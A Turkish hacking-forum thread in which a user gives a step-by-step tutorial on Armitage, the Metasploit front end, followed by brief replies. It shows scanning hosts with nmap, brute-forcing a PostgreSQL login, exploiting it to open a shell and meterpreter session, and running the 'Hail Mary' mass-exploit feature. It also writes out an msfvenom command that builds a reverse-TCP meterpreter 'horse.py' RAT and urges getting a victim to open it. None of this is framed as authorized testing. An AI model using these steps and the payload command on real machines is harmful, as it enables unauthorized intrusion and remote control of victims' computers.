İPUCU

Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

Seçenekler

Herşeyi ile Armitage Nedir ? #Belvando

Belvando - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Nereden:
Mantı V2
Mesajlar:
239
Konular:
34
Teşekkür (Etti):
59
Teşekkür (Aldı):
201
Ticaret:
(0) %
14-06-2017 19:18
#1
Thumbs up
Herşeyi ile Armitage Nedir ? #Belvando
Arkadaşlar Merhaba

Bugün sizlere Armitage adındaki sızma olaylarında kullanılan aracı tanıtacağım.


Armitage nedir?
Kendisi nekadar métasploit sistemini ve veritabanını kullansada hiçbir şekilde yapımcı bakımından bağlantısı bulunmamaktadır.
Métasploit konsol arayüzünü kullanamayan kullanıcıları için java ile yazılmış olan msfgui arayüzünü yaptı.
Ancak belli başlı sıkıntılar(Stabil değildi, çok yavaş ve kullanımı zordu) ile karşılaşınca kullanıcılardan tepki geldi ve tarihe karıştı.
Bunu fark eden abilerimizden (İsmini unuttuğum say adı Armitage) olan abimiz yine java dili ile yazılmış bir program hazırlar.
Ve gerçektende msfconsole dan dahada kolay ve hızlı bir kullanıma sahiptir.

(Ancak ben fazla düzeyde armitage kullanımını önermiyorum. Çünkü pentest yaparken insanı aşırı derecede rahata alıştırıp belli kullanımları unutmasına neden olabiliyor)

Artık başlayalım

Armitage ımızı açmak için iki şey lazım :
nmap in kurulu olması ve
postgresql i çalıştırmanız gerekmekte.

service postgresql start
(Eğer métasploiti dahili olmayan bir sisteme kurmuş iseniz postgresql sizin için métasploit olarak gelecektir)
Ardından armitage yazıp açıyoruz.
armitage



Karşımıza böyle bir ekran geliyor.
connect diyip geçiyoruz.
Evet bundan sonra konsola gerek duymucağımızdan aşşağıya çekiyoruz.
Sonra çıkan seçeneğede yes diyip söyle bir ekranla karşılaşıyoruz.



Burada veritabanını alıyodur ve reddedildi yazsa bile önemsemeyin bir sıkıntı yok.
İşlem bittiği zaman karşımıza arayüz geliyor.



KIRMIZI kısım= Exploit, auxiliary, post, payload ların olduğu ve seçildi yerdir.
MAVİ kısım= Kullanıcıların bulunduğu yerdir.
YESİL kısım= Konsol, dosyalar, çıktılar vb. gösterildiği yerdir.
(Resim yeteneğiminde çok iyi olduğunu söylerler )


Kısaca başlangıcı böyle anlatabiliriz.



Kullanımı

Sizinde gördüğünüz üzere armitagein belli pencereleri var.
Bu pencerelerden önem oluşturabilcek kısımları listeleyelim.

================================================== =================================================

Armitage>Listeners burada bind ve reverse adında iki seçenek var siz bunları kullanarak oluşturduğunuz RAT ı dinlemeye alabilir yada direk saldırmada kullana bilirsiniz.

View>? istediğiniz kısımlara ulaşabilirsiniz. (Karşı taraftan indirdiğiniz dosyaları downloadda, yürüyen işlerinizi jop kısmında görebilirsiniz)

Hosts>Import_Host daha önceden yaptığınız taramalarının çıktı dosyasını vererek kullanıcı ekleyebilirsiniz.
Hosts>Add_Host kendiniz kullanıcıların ip adresini girerek kullanıcı ekleyebilirsiniz.
Hosts>Nmap_Scan nmap ile kullanıcıları tarayabilir ve kullanıcıları ekleyebilirsiniz.
Hosts>MSF_Scans métasploitin tarama sistemidir.
Hosts>Clear_Database kullanıcı bilgilerini sıfırlar.

Attacks>Find_Attack kullanıcıyı tarayıp açık olan portları için kullanılan saldırıları bulur.
Attacks>Hail_Mary Karşı tarafa elinde ne varsa hepsi ile saldırır (Mükemmel birşey olup dos etkisi yarattığından güvenlik duvarları çoğu zaman fark eder.)

Workspaces>? bir çalışma alanı yapabilirsiniz.

================================================== =================================================

Ne güzel bir saldırı alanımız var ozaman buna biraz kullanıcı ekleyelim.

Hosts>Nmap_Scans>Ping



İp aralığımı girdikten sonra kendisi yeni bir alt pencere açarak nmap taramasını yapıyor ve kullanıcılarımı ekliyor.



Peki bu kullanıcıların işletim sistemleri ne?
Bu kullanıcıların hangi portları var?
Hangi exploitler bunlara uygulanabiliyor?

Şöyle:

3 kullanıcıyıda seçip sağ tuşa basarak scan diyebiliriz.

Yada

Ben işimi sağlama almak için Hosts>Nmap_Scans>Intense_Scan yaptıktan sonra Find_Attack yapıp düzgün bir sonucu doğruluyorum.



Attacks>Find_Attack yaptıktan sonra karşıma şöyle bir ekran gelip "Mutlu avlanmalar" diyor



Artık açık kısımlarda hazır olduğuna göre exploitleme örneklerini gösterelim.


Sağ_tuş>Login>? derseniz giriş yapılabilen servislere bruteforce yapabilirsiniz.

Login kısmından postgres i seçtim ve küçük bir pencereden şifreleri göstermek istiyor.
Ancak şifre olmadığından bruteforce yapmak için "Check all credentials" diyip elindeki wordlisti kullanmasını istiyoruz.




Launch dedikten sonra kendisi bulanadek tarama yapacaktır.




Birkaç denemeden sonra şifreyi buldu.

İstediğimiz bir kullanıcıya sağ_tuş>Attack>? derseniz orada size açık olan portlara uygun exploitler verir.

Bende mağlum şifreyi bulmuşum bizde postgresql e girelim.
Attack kısmından postgres i seçip orada tek birtane olan exploitimi seçiyorum.
Ve karşıma ayarlama kısmı geliyor.

(Bu ayarlama kısmındaki + lı olanları doldurmak zorundasınız)



Evet zaten kendisi + kısımları doldurmuş.
Alt tarafta "Use a reverse connection" yazıyor bu kullanılan payloadın türünü belirtir:
Eğer işaretler iseniz reverse payload yapar.(Karşı tarafa dosyayı yollar ve açmasını sağlar. Bizde dinlemede olduğumuz handlerden cevap bekleyerek sızarız)
İşaretlemeziseniz bind payload yapar.(Karşı tarafın direk portuna saldırı yaparak herhangi bir bekleme olmadan sızarız)
Tabi bu payload seçimlerini doğru yapmak gerekir ve neyi kullanmanız gerektiğini anlamanız iyi olacaktır.


Artık çalıştıralım.



Bize bir shell açtığını belirtti.
Biz nasıl kullanabiliriz bunu peki?
Zaten sizde bariz bir şekilde kullanıcı şeklinin değiştiğini farketmiş olucaksınız.
Kullanıcıya sağ_tuş yaptığımızda shell kısmından istediğimizi yapabiliriz.


Shellden yapılabilcekler:

İnteract diyerek shell kısmına geçiş yapabilirsiniz.
Upload diyerek karşı tarafa dosya gönderebilirsiniz.
Pass_session diyerek bir tane daha shell açabilirsiniz.
Post_modules diyerek karşı tarafa istediğiniz postu uygulayabilirsiniz.
(sol tarafta post arşivi bulunmaktadır)

Peki meterpreterden neler yapılabilir?
Post arşivinden shell_to_meterpreter postumu seçip uyguladığımda meterpreter elde ediyorum.
Buradan sizlere göstereceğim.




Elimizde bir tanede meterpreter oldu.
Kullanıcıya sağ_tuş ile meterpreter kısmınında açıldığını ve içerisinde daha fazla erişim olduğunu görebilceksiniz.


Meterpreterden yapılabilcekler

Interact kısmına extradan meterpreter konsolu geldi.
Explore ksımından doyalar arasında gezibilir, aktif programları görebilir, screeshot alabilirsiniz.

(Ayrıca shell de yapamadığımız kendimize indirmeyi meterpreterde yapabiliriz)
Pivoting diyerek kalıcılığı sağlayabilir/kaldırabilirsiniz.
Ping_sweep diyerek aynı ağdaki kullanıcıları görebilirsiniz.


{Bu anlattığım özellikler linux cihazlar içindir. Windows cihazlarda 2kat daha fazla özellik bulunmakta.}



Hail Mary (Kutsal Meryem[Hz.Meryem])

Bu özelliğimiz armitegein sloganı olan "Fast and Easy" nin tam bir kanıtıdır.
Espirisi adınada yansıyacağı üzere güçlü bir özelliktir.
Mantık basit:

Karşı tarafa normal bir tarama yapar, açıkları tarar, uygun exploitleri hazırlar ve hepsini aynı anda sizin yerineze dener.
Siz bu işlemi Métasploitte yaklaşık olarak 1,5 saat te yapabilir iken kendisi 5 dk civarına düşürmüş.

Tabi bukadar güçlü olduğu gibide kötü yanlarıda var:
Fazla hızlı davrandığından güvenlik duvarları bunu bir ddos olarak görüp tüm denemeleri boşa çıkarmış oluyor.
Çok saçma exploitleri deneyip zaman kaybettiriyor.
Ve bir mantık hatası olarakta, belli exploitler şifre istemekte bunun önüne geçmek için auxiliaryde çalıştırabilirdi böylece hem daha fazla açık kullanabilirdik ve seçebileceği exploitleride ona göre seçerdi, ancak böyle bir şey yapmaları şuan söz konusu değil.


Hadi ozaman bakalım.
Bu özelliğimiz Attacks>Hail_Mary kısmında bulunmakta.



Tıkladığımızda "Really?!?" diyerek adeta bizimle dalga geçip bu kadarmı eziksin demekte. Buna çok kızdım
Bunu yapmak istediğine eminsen evet de diyor ve bizde yes tuşuna basarak devam ediyoruz.




Kendisi burda teker teker payloadları deniyor.



Burada exploitleri nasıl denediğini gösteriyor.



İşlemlerini tamamladıktan sonra 30 saniye boyunca dinlemeye alıyor.
Ve bu işlem sonucunda bize 5 adet shell verdi.

(Sizinde bildiği üzere önceki konumda ben shell açmadanda meterpreter açabilmiştim. Ancak görünenoki Hail_Mary bu meterpreteri açamamış)
Açıkçası 4dk lık bekleme için gayet iyibir sonuç.



RAT oluşturma/dinleme

Ben bu işlerde uğraştığımdan beri RAT atanların genellikle armitage kullandığını fark ettim.
(Açıkçası nedenini bende bilmiyorum [Muhtemelen ben konsol arayüzünü beğendiğimden böyle davranıyor olabilirim])

Ozaman ratımızı oluşturmakla başlayalım.

Terminal kısmına geçip msfvenom aracımı çalıştırıyorum.
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.43.200 lport=9060 R > /home/belvando/Masaüstü/horse.py



Bir yolunu bulup payloadımızı attıktan sonra bi koşu armitagedan dinlememizi açmamız lazım bunun için,
Exploit kısmından handler ı seçebiliriz.



Bizden payloadımızın türünü istiyor ve default ta olan portu değiştirmemiz lazım.
Başlattıktan sonra karşı taraf artık dosyayı açabilir.
Açtığı anda bizim armitage kısmımıza düşecektir.







Benden bugünde bukadar
Okuduğunuz için teşşekkür ederim
Eğer beğendiseniz teşşekkür atmayı unutmayın.
Diğer konularıma burdan ulaşabilirsiniz:
http://www.turkhackteam.org/search.p...rchid=10398057

HEPİNİZ USTA BİR HACKERSINIZ, TABİ ÖĞRENMEK İSTERSENİZ.
---------------------
Bastığın yerleri 'toprak' diyerek geçme, tanı!
Düşün altındaki binlerce kefensiz yatanı.
Sen şehit oğlusun, incitme, yazıktır atanı;
Verme, dünyaları alsan da bu cennet vatanı.
Telegram: @belvando
Konu Belvando tarafından (20-07-2017 15:53 Saat 15:53 ) değiştirilmiştir.
Sprachlos - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2016
Nereden:
/etc/shadow
Mesajlar:
3.815
Konular:
213
Teşekkür (Etti):
22
Teşekkür (Aldı):
616
Ticaret:
(0) %
14-06-2017 19:19
#2
Emeğine sağlık.
---------------------
Eski Saldırı Timi Üyesi


sprach.ρнρ
JoseQual - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2016
Nereden:
Amazon
Mesajlar:
3.823
Konular:
246
Teşekkür (Etti):
630
Teşekkür (Aldı):
289
Ticaret:
(0) %
14-06-2017 19:23
#3
Anlamadığım şey şu ne işe yarıyor tam olarak ?
---------------------
BÖ

🇹🇷🇹🇷
•• Bilgisayarlarla para kazanmak icin yakın olmayın... Sanaldan uzak kalacağız ~
Sprachlos - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2016
Nereden:
/etc/shadow
Mesajlar:
3.815
Konular:
213
Teşekkür (Etti):
22
Teşekkür (Aldı):
616
Ticaret:
(0) %
14-06-2017 19:25
#4
Alıntı:
JoseQual´isimli üyeden Alıntı Mesajı göster
Anlamadığım şey şu ne işe yarıyor tam olarak ?
Sisteme sızıyorsun işte
---------------------
Eski Saldırı Timi Üyesi


sprach.ρнρ
JoseQual - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2016
Nereden:
Amazon
Mesajlar:
3.823
Konular:
246
Teşekkür (Etti):
630
Teşekkür (Aldı):
289
Ticaret:
(0) %
14-06-2017 19:26
#5
Alıntı:
Sprachlos´isimli üyeden Alıntı Mesajı göster
Sisteme sızıyorsun işte
Sisteme de hangi sisteme normal bir PC sistemine mı onu anlamadım ve neler yapabiliriz Rat atıyoruz da ratinizi ne özelliği var öyle.yani
---------------------
BÖ

🇹🇷🇹🇷
•• Bilgisayarlarla para kazanmak icin yakın olmayın... Sanaldan uzak kalacağız ~
Sprachlos - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2016
Nereden:
/etc/shadow
Mesajlar:
3.815
Konular:
213
Teşekkür (Etti):
22
Teşekkür (Aldı):
616
Ticaret:
(0) %
14-06-2017 19:28
#6
Alıntı:
JoseQual´isimli üyeden Alıntı Mesajı göster
Sisteme de hangi sisteme normal bir PC sistemine mı onu anlamadım ve neler yapabiliriz Rat atıyoruz da ratinizi ne özelliği var öyle.yani
Hedef sisteme işte herşeyi yapabilirsin.
---------------------
Eski Saldırı Timi Üyesi


sprach.ρнρ
UnexpectedZ - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
193
Konular:
3
Teşekkür (Etti):
57
Teşekkür (Aldı):
14
Ticaret:
(0) %
14-06-2017 19:29
#7
Alıntı:
HEPİNİZ USTA BİR HACKERSINIZ, TABİ ÖĞRENMEK İSTERSENİZ.
hazır programları kullanıyorsan + arka planda ne olup bittiğini anlamıyorsan hacker değilsindir
JoseQual - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2016
Nereden:
Amazon
Mesajlar:
3.823
Konular:
246
Teşekkür (Etti):
630
Teşekkür (Aldı):
289
Ticaret:
(0) %
14-06-2017 19:32
#8
Alıntı:
Sprachlos´isimli üyeden Alıntı Mesajı göster
Hedef sisteme işte herşeyi yapabilirsin.
Alıntı:
UnexpectedZ´isimli üyeden Alıntı Mesajı göster
hazır programları kullanıyorsan + arka planda ne olup bittiğini anlamıyorsan hacker değilsindir
Dostum Rat kullaniyormusun sen ? Yada sql aciği biliyormusun nasıl hacklendigini
---------------------
BÖ

🇹🇷🇹🇷
•• Bilgisayarlarla para kazanmak icin yakın olmayın... Sanaldan uzak kalacağız ~
UnexpectedZ - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
193
Konular:
3
Teşekkür (Etti):
57
Teşekkür (Aldı):
14
Ticaret:
(0) %
14-06-2017 19:34
#9
Alıntı:
JoseQual´isimli üyeden Alıntı Mesajı göster
Dostum Rat kullaniyormusun sen ? Yada sql aciği biliyormusun nasıl hacklendigini


SQL Bir açık değil bir veritabanı dilidir
Rat değil RAT, evet biliyorum soru mu soracaktın?
JoseQual - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2016
Nereden:
Amazon
Mesajlar:
3.823
Konular:
246
Teşekkür (Etti):
630
Teşekkür (Aldı):
289
Ticaret:
(0) %
14-06-2017 19:35
#10
Alıntı:
UnexpectedZ´isimli üyeden Alıntı Mesajı göster


SQL Bir açık değil bir veritabanı dilidir
Rat değil RAT, evet biliyorum soru mu soracaktın?
Yok sql biliyorum :d. Ratta port sorunu var
---------------------
BÖ

🇹🇷🇹🇷
•• Bilgisayarlarla para kazanmak icin yakın olmayın... Sanaldan uzak kalacağız ~

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı